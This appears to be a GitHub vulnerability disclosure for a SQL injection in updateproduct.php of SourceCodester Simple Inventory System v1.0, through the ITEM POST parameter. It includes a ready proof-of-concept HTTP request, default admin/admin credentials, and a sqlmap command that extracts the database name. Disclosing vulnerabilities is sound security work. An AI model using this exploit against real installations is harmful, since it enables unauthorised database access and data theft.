Skip to content

Latest commit

 

History

History
42 lines (29 loc) · 1.8 KB

SourceCodester Simple Inventory System Sql Inject-4.md

File metadata and controls

42 lines (29 loc) · 1.8 KB

SQL injection vulnerability exists in Sourcecodester Simple Inventory System

official website:https://www.sourcecodester.com/php/4481/simple-inventory-system-using-phpmysql.html

version:v1.0

route:updateproduct.php

injection parameter:$_POST['ITEM']

1.Vulnerability analysis

As shown in the figure below, in updateproduct.php, after the ITEM parameter is passed in through post, it is directly spliced into the SQL update statement without any security filtering, resulting in a SQL injection vulnerability. We can obtain any information in the database through time-based injection.

image-20240517162130368

2.Vulnerability verification and exploit

After admin/admin logs in to the system backend, replace the cookie content in the following POC and save it as 1.txt.

POST /updateproduct.php HTTP/1.1
Host: 10.15.6.184:82
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.15.6.184:82
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.15.6.184:82/tableedit.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ncbt63bs17glrou5b79l17ifm6
Connection: close

ITEM=1&itemnumber=11111

python sqlmap.py -r 1.txt --batch --current-db

image-20240517165913203